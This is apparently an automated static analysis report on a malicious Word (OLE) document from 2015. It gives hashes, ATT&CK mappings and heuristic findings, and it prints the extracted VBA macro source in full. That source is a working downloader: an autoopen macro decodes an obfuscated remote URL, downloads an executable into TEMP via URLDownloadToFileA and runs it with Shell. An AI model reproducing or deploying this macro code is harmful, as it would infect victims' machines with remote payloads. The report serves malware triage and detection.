Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b400baf11a2a402f…

MALICIOUS

Office (OLE)

44.5 KB Created: 2015-01-29 11:53:00 Authoring application: Microsoft Office Word First seen: 2015-03-15
MD5: 810d89cb8b63077d53e5c37edf026211 SHA-1: 2f1902a478232887eb36e78b9d9b6565720c4949 SHA-256: b400baf11a2a402f8ac05d1ecb99e81bbedebea859aae6918b16eaba8feff296
278 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains VBA macros with an autoopen subroutine, which is a common technique for executing malicious code upon opening the document. The script utilizes the URLDownloadToFileA API to download a second-stage payload from a remote location and then executes it using the Shell function. This indicates a downloader or droppper functionality.

Heuristics 9

  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    fTb_A = Shell(o04C, 1)
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    E1MwLaU707 VQuwdjCKzfbbafP("h t@tPp<:y/o/pdmawtZag.ug1mdscl‚lnpt.dc0ogm?/;j|sf/)b{iin„.4evxve]"), Environ(VQuwdjCKzfbbafP("TPMnPI")) & VQuwdjCKzfbbafP("\U3z2%4u2N3E5F2C3L5/.†e0xje:")
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4120 bytes
SHA-256: bffae6aaf9b7161ea59c4cf2cf67279a8c20018437155c22df404a01bcbf1e99
Detection
ClamAV: No threats found
Obfuscation or payload: likely
44 of 86 identifiers look randomly generated (e.g. 'nqtlJnRBxmGxoBL') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
eE5Ueh5
End Sub

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Function PvEED()

End Function
Public Function tYlkADG()

End Function
Private Sub fOxzTwB()

End Sub
Private Function HvhIfeFnE()

End Function
Private Function uGASPmHgZUgxMi()

End Function
Public Sub xbdIdjqgLUV()

End Sub
Public Function CJoBAQTQO()

End Function
Private Sub gNPkMRfcK()

End Sub

Attribute VB_Name = "ААвыаыва"
#If VBA7 Then
    Private Declare PtrSafe Function dfsdfsdfsdf Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
    ByVal sdfsdFFdsf As String, _
    ByVal sdfsdFFdsff As String, _
    ByVal sdfsdFFdsffd As Long, _
    ByVal sdfsdFFdsffds As LongPtr) As LongPtr
#Else
    Private Declare Function dfsdfsdfsdf Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
    ByVal sdfsdFFdsf As String, _
    ByVal sdfsdFFdsff As String, _
    ByVal sdfsdFFdsffd As Long, _
    ByVal sdfsdFFdsffds As Long) As Long
#End If

Function E1MwLaU707(BcbMtG1 As String, o04C As String) As Boolean
vJHKBJdfkgfg = dfsdfsdfsdf(0&, BcbMtG1, o04C, 0&, 0&)
fTb_A = Shell(o04C, 1)
End Function


Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub xMiUfC()

End Sub
Private Sub Idjqg()

End Sub
Public Sub TZwCJoBAQTQOoCv()

End Sub
Public Sub kMRfcKYxxZhuV()

End Sub
Public Function KlLQQjRpY()

End Function
Private Sub wNdkmvS()

End Sub
Public Sub agzHwcYYQ()

End Sub
Public Sub arRQhQaRqTyweS()

End Sub
Private Sub isbbNNpyKmGlJc()

End Sub
Private Sub SliFpzFBNefACLj()

End Sub
Private Function qwPYMsoonsdV()

End Function
Private Sub TknqiGOyujDuk()

End Sub
Private Sub reQsObpQ()

End Sub
Private Function EspjBy()

End Function
Private Function VRehvQScmhKasM()

End Function

Attribute VB_Name = "Module2"

Public Function VQuwdjCKzfbbafP(nqtlJnRBxmGxoBL As String) As String
For uiTvResardhH = 1 To Len(nqtlJnRBxmGxoBL) Step 2
VQuwdjCKzfbbafP = VQuwdjCKzfbbafP & Mid(nqtlJnRBxmGxoBL, uiTvResardhH, 1)
Next
End Function

Attribute VB_Name = "Module3"



Attribute VB_Name = "Module4"
Public Sub YjplwNdk()

End Sub
Public Function NrtagzHwcYYQbM()

End Function
Private Sub RQhQaRqT()

End Sub
Public Function SndTi()

End Function
Private Sub NNpyK()

End Sub
Private Sub JcncZSl()

End Sub
Public Function zFBNefAC()

End Function
Private Function tJqwPYMsoonsdV()

End Function
Private Sub TknqiG()

End Sub
Public Sub ujDukyIrre()

End Sub
Private Function bpQoaeEspjByV()

End Function
Private Function RehvQScmhKasMga()

End Function
Private Function EDItmtYlkAD()

End Function
Private Function mfOxzTwBOZuHvhI()

End Function
Sub eE5Ueh5()
E1MwLaU707 VQuwdjCKzfbbafP("h t@tPp<:y/o/pdmawtZag.ug1mdscl‚lnpt.dc0ogm?/;j|sf/)b{iin„.4evxve]"), Environ(VQuwdjCKzfbbafP("TPMnPI")) & VQuwdjCKzfbbafP("\U3z2%4u2N3E5F2C3L5/.†e0xje:")
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{54A06494-5A19-4897-8C03-D61544295ECA}{C251611E-0394-489A-9056-F3CBA9B75179}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.